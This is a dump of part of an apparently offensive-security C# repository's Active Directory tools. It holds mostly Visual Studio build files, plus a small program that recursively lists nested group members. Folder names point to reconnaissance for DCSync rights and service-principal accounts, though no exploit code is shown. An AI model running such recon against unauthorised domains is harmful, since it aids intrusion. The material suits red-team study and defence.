Tools/EnablePrivilege/TokenInformation/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache -------------------------------------------------------------------------------- /Active Directory Tools/EnablePrivilege/TokenInformation/obj/Debug/TokenInformation.csproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | C:\Users\stargirl\source\repos\WinAPI\TokenInformation\TokenInformation\bin\Debug\TokenInformation.exe.config 2 | C:\Users\stargirl\source\repos\WinAPI\TokenInformation\TokenInformation\bin\Debug\TokenInformation.exe 3 | C:\Users\stargirl\source\repos\WinAPI\TokenInformation\TokenInformation\bin\Debug\TokenInformation.pdb 4 | C:\Users\stargirl\source\repos\WinAPI\TokenInformation\TokenInformation\obj\Debug\TokenInformation.exe 5 | C:\Users\stargirl\source\repos\WinAPI\TokenInformation\TokenInformation\obj\Debug\TokenInformation.pdb 6 | C:\Users\stargirl\source\repos\WinAPI\TokenInformation\TokenInformation\obj\Debug\TokenInformation.csprojAssemblyReference.cache 7 | -------------------------------------------------------------------------------- /Active Directory Tools/EnablePrivilege/TokenInformation/obj/Debug/TokenInformation.csprojAssemblyReference.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Active Directory Tools/EnablePrivilege/TokenInformation/obj/Debug/TokenInformation.csprojAssemblyReference.cache -------------------------------------------------------------------------------- /Active Directory Tools/EnablePrivilege/TokenInformation/obj/Debug/TokenInformation.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Active Directory Tools/EnablePrivilege/TokenInformation/obj/Debug/TokenInformation.exe -------------------------------------------------------------------------------- /Active Directory Tools/EnablePrivilege/TokenInformation/obj/Debug/TokenInformation.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Active Directory Tools/EnablePrivilege/TokenInformation/obj/Debug/TokenInformation.pdb -------------------------------------------------------------------------------- /Active Directory Tools/Get-DCSyncUsers/.vs/ACL101/v16/.suo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Active Directory Tools/Get-DCSyncUsers/.vs/ACL101/v16/.suo -------------------------------------------------------------------------------- /Active Directory Tools/Get-DCSyncUsers/.vs/ACL101/v16/Server/sqlite3/db.lock: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Active Directory Tools/Get-DCSyncUsers/.vs/ACL101/v16/Server/sqlite3/db.lock -------------------------------------------------------------------------------- /Active Directory Tools/Get-DCSyncUsers/.vs/ACL101/v16/Server/sqlite3/storage.ide: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Active Directory Tools/Get-DCSyncUsers/.vs/ACL101/v16/Server/sqlite3/storage.ide -------------------------------------------------------------------------------- /Active Directory Tools/Get-DCSyncUsers/.vs/ACL101/v16/Server/sqlite3/storage.ide-shm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Active Directory Tools/Get-DCSyncUsers/.vs/ACL101/v16/Server/sqlite3/storage.ide-shm -------------------------------------------------------------------------------- /Active Directory Tools/Get-DCSyncUsers/.vs/ACL101/v16/Server/sqlite3/storage.ide-wal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Active Directory Tools/Get-DCSyncUsers/.vs/ACL101/v16/Server/sqlite3/storage.ide-wal -------------------------------------------------------------------------------- /Active Directory Tools/Get-DCSyncUsers/ACL101.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.29318.209 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "ACL101", "ACL101\ACL101.csproj", "{8298A94D-50D1-4475-BACE-0A78C1295A07}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Release|Any CPU = Release|Any CPU 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {8298A94D-50D1-4475-BACE-0A78C1295A07}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 15 | {8298A94D-50D1-4475-BACE-0A78C1295A07}.Debug|Any CPU.Build.0 = Debug|Any CPU 16 | {8298A94D-50D1-4475-BACE-0A78C1295A07}.Release|Any CPU.ActiveCfg = Release|Any CPU 17 | {8298A94D-50D1-4475-BACE-0A78C1295A07}.Release|Any CPU.Build.0 = Release|Any CPU 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | EndGlobalSection 22 | GlobalSection(ExtensibilityGlobals) = postSolution 23 | SolutionGuid = {11EBE3A2-9DB8-4DF0-92FB-39F1D66A2F75} 24 | EndGlobalSection 25 | EndGlobal 26 | -------------------------------------------------------------------------------- /Active Directory Tools/Get-DCSyncUsers/ACL101/App.config: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /Active Directory Tools/Get-DCSyncUsers/ACL101/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 8 | [assembly: AssemblyTitle("ACL101")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("ACL101")] 13 | [assembly: AssemblyCopyright("Copyright © 2022")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("8298a94d-50d1-4475-bace-0a78c1295a07")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /Active Directory Tools/Get-DCSyncUsers/ACL101/bin/Debug/ACL101.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Active Directory Tools/Get-DCSyncUsers/ACL101/bin/Debug/ACL101.exe -------------------------------------------------------------------------------- /Active Directory Tools/Get-DCSyncUsers/ACL101/bin/Debug/ACL101.exe.config: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /Active Directory Tools/Get-DCSyncUsers/ACL101/bin/Debug/ACL101.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Active Directory Tools/Get-DCSyncUsers/ACL101/bin/Debug/ACL101.pdb -------------------------------------------------------------------------------- /Active Directory Tools/Get-DCSyncUsers/ACL101/obj/Debug/ACL101.csproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | C:\Users\stargirl\source\repos\ACL101\ACL101\bin\Debug\ACL101.exe.config 2 | C:\Users\stargirl\source\repos\ACL101\ACL101\bin\Debug\ACL101.exe 3 | C:\Users\stargirl\source\repos\ACL101\ACL101\bin\Debug\ACL101.pdb 4 | C:\Users\stargirl\source\repos\ACL101\ACL101\obj\Debug\ACL101.exe 5 | C:\Users\stargirl\source\repos\ACL101\ACL101\obj\Debug\ACL101.pdb 6 | C:\Users\stargirl\source\repos\ACL101\ACL101\obj\Debug\ACL101.csprojAssemblyReference.cache 7 | -------------------------------------------------------------------------------- /Active Directory Tools/Get-DCSyncUsers/ACL101/obj/Debug/ACL101.csprojAssemblyReference.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Active Directory Tools/Get-DCSyncUsers/ACL101/obj/Debug/ACL101.csprojAssemblyReference.cache -------------------------------------------------------------------------------- /Active Directory Tools/Get-DCSyncUsers/ACL101/obj/Debug/ACL101.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Active Directory Tools/Get-DCSyncUsers/ACL101/obj/Debug/ACL101.exe -------------------------------------------------------------------------------- /Active Directory Tools/Get-DCSyncUsers/ACL101/obj/Debug/ACL101.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Active Directory Tools/Get-DCSyncUsers/ACL101/obj/Debug/ACL101.pdb -------------------------------------------------------------------------------- /Active Directory Tools/Get-DCSyncUsers/ACL101/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Active Directory Tools/Get-DCSyncUsers/ACL101/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache -------------------------------------------------------------------------------- /Active Directory Tools/Get-NestedMembersofGroup/.vs/GetGroup/DesignTimeBuild/.dtbcache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Active Directory Tools/Get-NestedMembersofGroup/.vs/GetGroup/DesignTimeBuild/.dtbcache -------------------------------------------------------------------------------- /Active Directory Tools/Get-NestedMembersofGroup/.vs/GetGroup/v16/.suo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Active Directory Tools/Get-NestedMembersofGroup/.vs/GetGroup/v16/.suo -------------------------------------------------------------------------------- /Active Directory Tools/Get-NestedMembersofGroup/.vs/GetGroup/v16/Server/sqlite3/db.lock: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Active Directory Tools/Get-NestedMembersofGroup/.vs/GetGroup/v16/Server/sqlite3/db.lock -------------------------------------------------------------------------------- /Active Directory Tools/Get-NestedMembersofGroup/.vs/GetGroup/v16/Server/sqlite3/storage.ide: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Active Directory Tools/Get-NestedMembersofGroup/.vs/GetGroup/v16/Server/sqlite3/storage.ide -------------------------------------------------------------------------------- /Active Directory Tools/Get-NestedMembersofGroup/.vs/GetGroup/v16/Server/sqlite3/storage.ide-shm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Active Directory Tools/Get-NestedMembersofGroup/.vs/GetGroup/v16/Server/sqlite3/storage.ide-shm -------------------------------------------------------------------------------- /Active Directory Tools/Get-NestedMembersofGroup/.vs/GetGroup/v16/Server/sqlite3/storage.ide-wal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Active Directory Tools/Get-NestedMembersofGroup/.vs/GetGroup/v16/Server/sqlite3/storage.ide-wal -------------------------------------------------------------------------------- /Active Directory Tools/Get-NestedMembersofGroup/GetGroup.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.29318.209 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "GetGroup", "GetGroup\GetGroup.csproj", "{8654C31D-A198-4237-B991-5E4290FECDD3}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Release|Any CPU = Release|Any CPU 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {8654C31D-A198-4237-B991-5E4290FECDD3}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 15 | {8654C31D-A198-4237-B991-5E4290FECDD3}.Debug|Any CPU.Build.0 = Debug|Any CPU 16 | {8654C31D-A198-4237-B991-5E4290FECDD3}.Release|Any CPU.ActiveCfg = Release|Any CPU 17 | {8654C31D-A198-4237-B991-5E4290FECDD3}.Release|Any CPU.Build.0 = Release|Any CPU 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | EndGlobalSection 22 | GlobalSection(ExtensibilityGlobals) = postSolution 23 | SolutionGuid = {752F09C3-4715-40A9-A034-6B0F113E4149} 24 | EndGlobalSection 25 | EndGlobal 26 | -------------------------------------------------------------------------------- /Active Directory Tools/Get-NestedMembersofGroup/GetGroup/Class1.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.DirectoryServices.AccountManagement; 3 | using System.DirectoryServices.ActiveDirectory; 4 | 5 | namespace GetGroup 6 | { 7 | public class Class1 8 | { 9 | 10 | public void GetAllMembers(string groupName,string domainName) 11 | { 12 | PrincipalContext p = new PrincipalContext(ContextType.Domain, domainName); 13 | GroupPrincipal gp = GroupPrincipal.FindByIdentity(p,groupName); 14 | foreach(Principal group in gp.GetMembers()) 15 | { 16 | if (group.StructuralObjectClass == "user") 17 | { 18 | Console.WriteLine("User: {0} is memberOf {1}",group.Name,groupName); 19 | } 20 | if (group.StructuralObjectClass == "group") 21 | { 22 | Console.WriteLine("Group: {0} is memberOf {1}",group.Name,groupName); 23 | GetAllMembers(group.Name, domainName); 24 | } 25 | } 26 | } 27 | 28 | 29 | public static void Main(string[] args) 30 | { 31 | try 32 | { 33 | string groupname = args[0]; 34 | string domainname = args[1]; 35 | 36 | Class1 c = new Class1(); 37 | c.GetAllMembers(groupname, domainname); 38 | } 39 | catch { } 40 | //Console.ReadKey(); 41 | } 42 | } 43 | } 44 | -------------------------------------------------------------------------------- /Active Directory Tools/Get-NestedMembersofGroup/GetGroup/GetGroup.csproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | net48 5 | 6 | Exe 7 | 8 | 9 | 10 | 11 | full 12 | true 13 | 14 | 15 | 16 | 17 | 18 | 19 | 20 | 21 | 22 | -------------------------------------------------------------------------------- /Active Directory Tools/Get-NestedMembersofGroup/GetGroup/bin/Debug/net48/GetGroup.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Active Directory Tools/Get-NestedMembersofGroup/GetGroup/bin/Debug/net48/GetGroup.exe -------------------------------------------------------------------------------- /Active Directory Tools/Get-NestedMembersofGroup/GetGroup/bin/Debug/net48/GetGroup.exe.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /Active Directory Tools/Get-NestedMembersofGroup/GetGroup/bin/Debug/net48/GetGroup.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Active Directory Tools/Get-NestedMembersofGroup/GetGroup/bin/Debug/net48/GetGroup.pdb -------------------------------------------------------------------------------- /Active Directory Tools/Get-NestedMembersofGroup/GetGroup/obj/Debug/net48/GetGroup.AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | //------------------------------------------------------------------------------ 2 | // 3 | // This code was generated by a tool. 4 | // Runtime Version:4.0.30319.42000 5 | // 6 | // Changes to this file may cause incorrect behavior and will be lost if 7 | // the code is regenerated. 8 | // 9 | //------------------------------------------------------------------------------ 10 | 11 | using System; 12 | using System.Reflection; 13 | 14 | [assembly: System.Reflection.AssemblyCompanyAttribute("GetGroup")] 15 | [assembly: System.Reflection.AssemblyConfigurationAttribute("Debug")] 16 | [assembly: System.Reflection.AssemblyFileVersionAttribute("1.0.0.0")] 17 | [assembly: System.Reflection.AssemblyInformationalVersionAttribute("1.0.0")] 18 | [assembly: System.Reflection.AssemblyProductAttribute("GetGroup")] 19 | [assembly: System.Reflection.AssemblyTitleAttribute("GetGroup")] 20 | [assembly: System.Reflection.AssemblyVersionAttribute("1.0.0.0")] 21 | 22 | // Generated by the MSBuild WriteCodeFragment class. 23 | 24 | -------------------------------------------------------------------------------- /Active Directory Tools/Get-NestedMembersofGroup/GetGroup/obj/Debug/net48/GetGroup.AssemblyInfoInputs.cache: -------------------------------------------------------------------------------- 1 | bdcf01f57ed9181ccc578c8ad5797722732c7cd8 2 | -------------------------------------------------------------------------------- /Active Directory Tools/Get-NestedMembersofGroup/GetGroup/obj/Debug/net48/GetGroup.assets.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Active Directory Tools/Get-NestedMembersofGroup/GetGroup/obj/Debug/net48/GetGroup.assets.cache -------------------------------------------------------------------------------- /Active Directory Tools/Get-NestedMembersofGroup/GetGroup/obj/Debug/net48/GetGroup.csproj.FileListAbsolute.txt: -------------------------------------------------------------------------------- 1 | C:\Users\stargirl\source\repos\GetGroup\GetGroup\bin\Debug\net48\GetGroup.exe.config 2 | C:\Users\stargirl\source\repos\GetGroup\GetGroup\bin\Debug\net48\GetGroup.exe 3 | C:\Users\stargirl\source\repos\GetGroup\GetGroup\bin\Debug\net48\GetGroup.pdb 4 | C:\Users\stargirl\source\repos\GetGroup\GetGroup\obj\Debug\net48\GetGroup.AssemblyInfoInputs.cache 5 | C:\Users\stargirl\source\repos\GetGroup\GetGroup\obj\Debug\net48\GetGroup.AssemblyInfo.cs 6 | C:\Users\stargirl\source\repos\GetGroup\GetGroup\obj\Debug\net48\GetGroup.exe 7 | C:\Users\stargirl\source\repos\GetGroup\GetGroup\obj\Debug\net48\GetGroup.pdb 8 | C:\Users\stargirl\source\repos\GetGroup\GetGroup\obj\Debug\net48\GetGroup.csprojAssemblyReference.cache 9 | -------------------------------------------------------------------------------- /Active Directory Tools/Get-NestedMembersofGroup/GetGroup/obj/Debug/net48/GetGroup.csprojAssemblyReference.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Active Directory Tools/Get-NestedMembersofGroup/GetGroup/obj/Debug/net48/GetGroup.csprojAssemblyReference.cache -------------------------------------------------------------------------------- /Active Directory Tools/Get-NestedMembersofGroup/GetGroup/obj/Debug/net48/GetGroup.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Active Directory Tools/Get-NestedMembersofGroup/GetGroup/obj/Debug/net48/GetGroup.exe -------------------------------------------------------------------------------- /Active Directory Tools/Get-NestedMembersofGroup/GetGroup/obj/Debug/net48/GetGroup.exe.withSupportedRuntime.config: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /Active Directory Tools/Get-NestedMembersofGroup/GetGroup/obj/Debug/net48/GetGroup.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Active Directory Tools/Get-NestedMembersofGroup/GetGroup/obj/Debug/net48/GetGroup.pdb -------------------------------------------------------------------------------- /Active Directory Tools/Get-NestedMembersofGroup/GetGroup/obj/Debug/netstandard2.0/GetGroup.AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | //------------------------------------------------------------------------------ 2 | // 3 | // This code was generated by a tool. 4 | // Runtime Version:4.0.30319.42000 5 | // 6 | // Changes to this file may cause incorrect behavior and will be lost if 7 | // the code is regenerated. 8 | // 9 | //------------------------------------------------------------------------------ 10 | 11 | using System; 12 | using System.Reflection; 13 | 14 | [assembly: System.Reflection.AssemblyCompanyAttribute("GetGroup")] 15 | [assembly: System.Reflection.AssemblyConfigurationAttribute("Debug")] 16 | [assembly: System.Reflection.AssemblyFileVersionAttribute("1.0.0.0")] 17 | [assembly: System.Reflection.AssemblyInformationalVersionAttribute("1.0.0")] 18 | [assembly: System.Reflection.AssemblyProductAttribute("GetGroup")] 19 | [assembly: System.Reflection.AssemblyTitleAttribute("GetGroup")] 20 | [assembly: System.Reflection.AssemblyVersionAttribute("1.0.0.0")] 21 | 22 | // Generated by the MSBuild WriteCodeFragment class. 23 | 24 | -------------------------------------------------------------------------------- /Active Directory Tools/Get-NestedMembersofGroup/GetGroup/obj/Debug/netstandard2.0/GetGroup.AssemblyInfoInputs.cache: -------------------------------------------------------------------------------- 1 | bdcf01f57ed9181ccc578c8ad5797722732c7cd8 2 | -------------------------------------------------------------------------------- /Active Directory Tools/Get-NestedMembersofGroup/GetGroup/obj/Debug/netstandard2.0/GetGroup.assets.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Active Directory Tools/Get-NestedMembersofGroup/GetGroup/obj/Debug/netstandard2.0/GetGroup.assets.cache -------------------------------------------------------------------------------- /Active Directory Tools/Get-NestedMembersofGroup/GetGroup/obj/Debug/netstandard2.0/GetGroup.csprojAssemblyReference.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Active Directory Tools/Get-NestedMembersofGroup/GetGroup/obj/Debug/netstandard2.0/GetGroup.csprojAssemblyReference.cache -------------------------------------------------------------------------------- /Active Directory Tools/Get-NestedMembersofGroup/GetGroup/obj/GetGroup.csproj.nuget.cache: -------------------------------------------------------------------------------- 1 | { 2 | "version": 1, 3 | "dgSpecHash": "y7LCKZeku+s3lSj0LiE8/BAn45wLGKTCs3ol2tdY/8+2kC6fkuAMNk1uSaJu44P0vbdOaokDm3bcH0yd5gktAw==", 4 | "success": true 5 | } -------------------------------------------------------------------------------- /Active Directory Tools/Get-NestedMembersofGroup/GetGroup/obj/GetGroup.csproj.nuget.dgspec.json: -------------------------------------------------------------------------------- 1 | { 2 | "format": 1, 3 | "restore": { 4 | "C:\\Users\\stargirl\\source\\repos\\GetGroup\\GetGroup\\GetGroup.csproj": {} 5 | }, 6 | "projects": { 7 | "C:\\Users\\stargirl\\source\\repos\\GetGroup\\GetGroup\\GetGroup.csproj": { 8 | "version": "1.0.0", 9 | "restore": { 10 | "projectUniqueName": "C:\\Users\\stargirl\\source\\repos\\GetGroup\\GetGroup\\GetGroup.csproj", 11 | "projectName": "GetGroup", 12 | "projectPath": "C:\\Users\\stargirl\\source\\repos\\GetGroup\\GetGroup\\GetGroup.csproj", 13 | "packagesPath": "C:\\Users\\stargirl\\.nuget\\packages\\", 14 | "outputPath": "C:\\Users\\stargirl\\source\\repos\\GetGroup\\GetGroup\\obj\\", 15 | "projectStyle": "PackageReference", 16 | "configFilePaths": [ 17 | "C:\\Users\\stargirl\\AppData\\Roaming\\NuGet\\NuGet.Config", 18 | "C:\\Program Files (x86)\\NuGet\\Config\\Microsoft.VisualStudio.Offline.config" 19 | ], 20 | "originalTargetFrameworks": [ 21 | "net48" 22 | ], 23 | "sources": { 24 | "C:\\Program Files (x86)\\Microsoft SDKs\\NuGetPackages\\": {}, 25 | "https://api.nuget.org/v3/index.json": {} 26 | }, 27 | "frameworks": { 28 | "net48": { 29 | "projectReferences": {} 30 | } 31 | }, 32 | "warningProperties": { 33 | "warnAsError": [ 34 | "NU1605" 35 | ] 36 | } 37 | }, 38 | "frameworks": { 39 | "net48": { 40 | "runtimeIdentifierGraphPath": "C:\\Program Files\\dotnet\\sdk\\3.0.100\\RuntimeIdentifierGraph.json" 41 | } 42 | }, 43 | "runtimes": { 44 | "win7-x86": { 45 | "#import": [] 46 | } 47 | } 48 | } 49 | } 50 | } -------------------------------------------------------------------------------- /Active Directory Tools/Get-NestedMembersofGroup/GetGroup/obj/GetGroup.csproj.nuget.g.props: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | True 5 | NuGet 6 | $(MSBuildThisFileDirectory)project.assets.json 7 | $(UserProfile)\.nuget\packages\ 8 | C:\Users\stargirl\.nuget\packages\ 9 | PackageReference 10 | 5.3.0 11 | 12 | 13 | $(MSBuildAllProjects);$(MSBuildThisFileFullPath) 14 | 15 | -------------------------------------------------------------------------------- /Active Directory Tools/Get-NestedMembersofGroup/GetGroup/obj/GetGroup.csproj.nuget.g.targets: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | $(MSBuildAllProjects);$(MSBuildThisFileFullPath) 5 | 6 | -------------------------------------------------------------------------------- /Active Directory Tools/Get-NestedMembersofGroup/GetGroup/obj/project.assets.json: -------------------------------------------------------------------------------- 1 | { 2 | "version": 3, 3 | "targets": { 4 | ".NETFramework,Version=v4.8": {}, 5 | ".NETFramework,Version=v4.8/win7-x86": {} 6 | }, 7 | "libraries": {}, 8 | "projectFileDependencyGroups": { 9 | ".NETFramework,Version=v4.8": [] 10 | }, 11 | "packageFolders": { 12 | "C:\\Users\\stargirl\\.nuget\\packages\\": {} 13 | }, 14 | "project": { 15 | "version": "1.0.0", 16 | "restore": { 17 | "projectUniqueName": "C:\\Users\\stargirl\\source\\repos\\GetGroup\\GetGroup\\GetGroup.csproj", 18 | "projectName": "GetGroup", 19 | "projectPath": "C:\\Users\\stargirl\\source\\repos\\GetGroup\\GetGroup\\GetGroup.csproj", 20 | "packagesPath": "C:\\Users\\stargirl\\.nuget\\packages\\", 21 | "outputPath": "C:\\Users\\stargirl\\source\\repos\\GetGroup\\GetGroup\\obj\\", 22 | "projectStyle": "PackageReference", 23 | "configFilePaths": [ 24 | "C:\\Users\\stargirl\\AppData\\Roaming\\NuGet\\NuGet.Config", 25 | "C:\\Program Files (x86)\\NuGet\\Config\\Microsoft.VisualStudio.Offline.config" 26 | ], 27 | "originalTargetFrameworks": [ 28 | "net48" 29 | ], 30 | "sources": { 31 | "C:\\Program Files (x86)\\Microsoft SDKs\\NuGetPackages\\": {}, 32 | "https://api.nuget.org/v3/index.json": {} 33 | }, 34 | "frameworks": { 35 | "net48": { 36 | "projectReferences": {} 37 | } 38 | }, 39 | "warningProperties": { 40 | "warnAsError": [ 41 | "NU1605" 42 | ] 43 | } 44 | }, 45 | "frameworks": { 46 | "net48": { 47 | "runtimeIdentifierGraphPath": "C:\\Program Files\\dotnet\\sdk\\3.0.100\\RuntimeIdentifierGraph.json" 48 | } 49 | }, 50 | "runtimes": { 51 | "win7-x86": { 52 | "#import": [] 53 | } 54 | } 55 | } 56 | } -------------------------------------------------------------------------------- /Active Directory Tools/Get-UsersSPN/.vs/GetUsersSPN/v16/.suo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Active Directory Tools/Get-UsersSPN/.vs/GetUsersSPN/v16/.suo -------------------------------------------------------------------------------- /Active Directory Tools/Get-UsersSPN/.vs/GetUsersSPN/v16/Server/sqlite3/db.lock: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Active Directory Tools/Get-UsersSPN/.vs/GetUsersSPN/v16/Server/sqlite3/db.lock -------------------------------------------------------------------------------- /Active Directory Tools/Get-UsersSPN/.vs/GetUsersSPN/v16/Server/sqlite3/storage.ide: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Active Directory Tools/Get-UsersSPN/.vs/GetUsersSPN/v16/Server/sqlite3/storage.ide -------------------------------------------------------------------------------- /Active Directory Tools/Get-UsersSPN/.vs/GetUsersSPN/v16/Server/sqlite3/storage.ide-shm: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Active Directory Tools/Get-UsersSPN/.vs/GetUsersSPN/v16/Server/sqlite3/storage.ide-shm -------------------------------------------------------------------------------- /Active Directory Tools/Get-UsersSPN/.vs/GetUsersSPN/v16/Server/sqlite3/storage.ide-wal: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/winsecurity/Offensive-C-Sharp/277b21a04a2d95e422720daa993e52e278340849/Active Directory Tools/Get-UsersSPN/.vs/GetUsersSPN/v16/Server/sqlite3/storage.ide-wal -------------------------------------------------------------------------------- /Active Directory Tools/Get-UsersSPN/GetUsersSPN.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.29318.209 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "GetUsersSPN", "GetUsersSPN\GetUsersSPN.csproj", 